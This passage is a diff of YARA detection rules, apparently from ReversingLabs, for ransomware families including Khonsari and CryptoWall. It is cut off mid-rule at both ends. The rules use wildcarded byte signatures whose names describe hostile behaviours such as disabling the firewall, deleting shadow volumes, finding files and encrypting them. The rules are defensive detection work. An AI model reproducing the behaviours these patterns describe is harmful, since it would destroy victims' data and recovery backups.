+            85 ?? ?? ?? ?? 33 FF 33 C0 89 8D ?? ?? ?? ?? 6A ?? 51 89 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 70 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 8A 0E
+            3A 08 75 ?? 84 C9 74 ?? 8A 4E ?? 3A 48 ?? 75 ?? 83 C6 ?? 83 C0 ?? 84 C9 75 ?? 33 C0
+            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8
+            68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 8B 40 ?? 8B F8 E8 ?? ?? ?? ??
+            33 D2 B9 ?? ?? ?? ?? F7 F1 8A 04 3A 88 04 1E 46 83 FE ?? 7C ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 33 C9 23 F9 89 8D ?? ?? ?? ?? 3D ?? ?? ?? ??
+            0F 87 ?? ?? ?? ?? 48 83 E0 ?? 83 C0 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF B5 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF
+        }
+		$encrypt_files_p2 = {
+            0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ??
+            ?? 83 C4 ?? 33 FF 3B B5 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 3B 85 ?? ?? ?? ?? 0F 85
+            ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ??
+            ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 53 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 85 ?? ?? ??
+            ?? 57 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 75 ?? 57 6A ??
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 3B 85 ?? ?? ?? ?? 75 ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 33 FF 56 E8
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 5B 85 C0 74 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 33 CD
+            5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$disable_fw_and_delete_shadow_volumes = {
+            6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 74 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D7 E9 ?? ??
+            ?? ?? 6A ?? FF 35 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ??
+            50 FF 35 ?? ?? ?? ?? FF D3 6A ?? FF 35 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 8B 48 ?? 51
+            FF 35 ?? ?? ?? ?? FF D3 8B F8 8D 85 ?? ?? ?? ?? 50 FF D6 8D 45 ?? 50 8D 85 ?? ?? ??
+            ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 40 ?? 50 6A ?? FF 95 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ??
+            ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ??
+            FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALERIANO BEDESCHI" and pe.signatures [ i ] . serial == "02:f1:75:66:ef:56:8d:c0:6c:9a:37:9e:a2:f4:fa:ea" and 1441324799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $disable_fw_and_delete_shadow_volumes ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7D824Ba1F7F730319C50D64C9A7Ed507 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Khonsari : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Khonsari ransomware."
 		author = "ReversingLabs"
-		id = "4372aea7-a25b-5211-befd-9e0bcfb09199"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c3c64256-af1f-5a9d-8a59-8d72993bb8da"
+		date = "2022-01-27"
+		modified = "2022-01-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2302-L2318"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Khonsari.yara#L1-L68"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "407611603974c910d9a6a0ed71ecdf54ddcc59abb0f48c60846e61d6d4191933"
+		logic_hash = "f1003b7863215bcd8e5cdce8ce40551105fb668ea2b8ac765909f9fa5373e6ca"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Khonsari"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
+            13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 0B
+            16 0C 2B ?? 07 08 9A 0D 09 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ??
+            ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 09
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 06 1B 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            06 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11
+            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            06 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 2D ?? 00 11
+            ?? 7E ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 72 ??
+            ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
+            ?? ?? ?? ?? DC DE ?? 26 DE ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ??
+            28 ?? ?? ?? ?? 26 2A
+        }
+		$get_key = {
+            73 ?? ?? ?? ?? 0A 06 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11
+            ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D
+            ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ??
+            ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 07 6F ??
+            ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11
+            ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A
+        }
+		$encrypt_files = {
+            28 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 6F ?? ?? ?? ?? 06 20
+            ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 6F ?? ??
+            ?? ?? 06 19 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 02 03 07 28 ?? ??
+            ?? ?? 0C DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "joaweb" and pe.signatures [ i ] . serial == "7d:82:4b:a1:f7:f7:30:31:9c:50:d6:4c:9a:7e:d5:07" and 1238025599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $get_key ) and ( $encrypt_files )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_77A64759F12766E363D779998C71Bdc9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryptowall : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CryptoWall ransomware."
 		author = "ReversingLabs"
-		id = "98acd01b-c452-530d-8814-2591810ecd53"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "06d8b106-d69a-526a-8e16-c95d39eb2993"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2320-L2336"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CryptoWall.yara#L3-L312"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2bf3d99ddec6b76da1ca60a9285767a5b34b84455db58195fc5d8fd8a22c9f8a"
+		logic_hash = "74baa04ee506732e0bb64a77cfd2d2216fcc978f13447ef07862e0116c093c14"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 88
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CryptoWall"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$v30_entrypoint = {
+            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 9A 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 7E C7 45 ?? ?? ?? ?? ??
+            8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2
+            E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2
+        }
+		$v20_entrypoint = {
+            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 A3 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 83 00 00 00 C7 45 ??
+            ?? ?? ?? ?? 8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 6A 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ??
+            ?? ?? FF D2 E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2
+        }
+		$v30_api_load = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 50 01 00 00 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 34 01 00 00 B9 ?? ?? ?? ?? 6B D1 ?? 8B 45 ?? 8B 4D ?? 03 4C 10 ?? 89 4D ?? 8B
+            55 ?? 8B 45 ?? 03 42 ?? 89 45 ?? 8B 4D ?? 8B 55 ?? 03 51 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? C7 45 ?? ?? ??
+            ?? ?? EB 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 3B 48 ?? 0F 83 DA 00 00 00 8B 55 ?? 8B 45 ?? 8B 4D ?? 03 0C 90
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 3B 45 ?? 0F 85 B7 00 00 00 BA ?? ?? ?? ?? 6B C2 ?? 8B 4D ?? 8B 54 01 ?? 8B 44 01 ?? 89 55 ??
+            89 45 ?? 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 14 81 3B 55 ?? 76 71 8B 45 ?? 8B 4D ?? 0F B7 14 41 8B 45 ?? 03 45 ??
+            8B 4D ?? 39 04 91 73 59 8B 55 ?? 8B 45 ?? 0F B7 0C 50 8B 55 ?? 8B 45 ?? 03 04 8A 89 45 ?? 74 3F 6A ?? 8B 4D ?? 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 55 ?? 8D 44 02 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8D 45 ?? 50 6A ?? 8D 4D ??
+            51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 40 ?? FF D0 EB 16 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 55 ?? 03 14 81 89 55 ?? EB
+            05 E9 0E FF FF FF 8B 45 ?? 8B E5 5D C3
+        }
+		$v30_dll_load = {
+            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 58 8B 45 ?? 8B 48 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45
+            ?? 8B 08 89 4D ?? 8B 55 ?? 3B 55 ?? 74 36 8B 45 ?? 89 45 ?? 8B 4D ?? 0F B7 51 ?? D1 EA 52 8B 45 ?? 8B 48 ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 3B 45 ?? 75 08 8B 55 ?? 8B 42 ?? EB 0C 8B 45 ?? 8B 08 89 4D ?? EB C2 33 C0 8B E5 5D C3
+        }
+		$v30_calculate_hash = {
+            55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5E 83 7D ?? ?? 74 58 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55
+            ?? 83 EA ?? 89 55 ?? 83 7D ?? ?? 74 3D 8B 45 ?? 66 8B 08 66 89 4D ?? 8B 75 ?? C1 EE ?? 0F B7 55 ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 0F B7 C0 33 45 ?? 25 ?? ?? ?? ?? 33 34 85 ?? ?? ?? ?? 89 75 ?? 8B 4D ?? 83 C1 ?? 89 4D ?? EB AE 8B 45 ?? 83 F0 ??
+            5E 8B E5 5D C3
+        }
+		$v30_1_find_file_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 47 02 00 00 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 32 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68
+            ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 B2 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 84 01 00
+            00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 A0 00 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 0F 85 80 00 00 00 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 69 C7 45 ?? ?? ??
+            ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 47 8B 45 ?? 50 8B 4D ?? 8B 11 52 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51
+        }
+		$v30_1_find_file_2 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
+            54 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 4D ?? 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 55 ?? 52 8B 45 ?? 50 E8 30 FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 4D ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 85 CE FE FF FF 8B 55 ?? 52 E8 ??
+            ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 74 2E 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 55 ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
+        }
+		$v30_2_find_file_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 ( 3B | 3D ) 02 00 00 E8 ?? ?? ??
+            ?? 89 45 ?? 83 7D ?? ?? 0F 84 ( 26 | 28 ) 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ??
+            ?? ?? ?? FF D1 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 83 7D ?? ?? 0F 84 ( A6 | A8 ) 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ??
+            83 7D ?? ?? 0F 84 ( 78 | 7A ) 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 94 00 00 00 C7 45 ?? ?? ?? ??
+            ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 78 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 C7
+            45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 43 8B 55 ?? 8B 02 50 8B
+        }
+		$v30_2_find_file_2 = {
+            4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
+            54 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 55 ?? 52 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 45 ?? 50 8B 4D ?? 51 E8 3C FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 55 ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 85 DA FE FF FF 8B 45 ?? 50 E8 ??
+            ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 74 ( 2E | 30 ) 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 ( 0E | 10 ) 6A ?? [0-2] 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 89 55 ?? 8B 45 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
+        }
+		$v30_3_find_file_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 7C 02 00 00 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 67 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68
+            ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 E7 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 B9 01 00
+            00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 91 00 00 00 8D 55
+            ?? 52 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 7A 8B 4D ?? 8B 11 83 E2 ?? 75 70 C7 45 ?? ?? ?? ?? ?? 8D 45
+            ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 49 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 8B 45 ?? 8B
+        }
+		$v30_3_find_file_2 = {
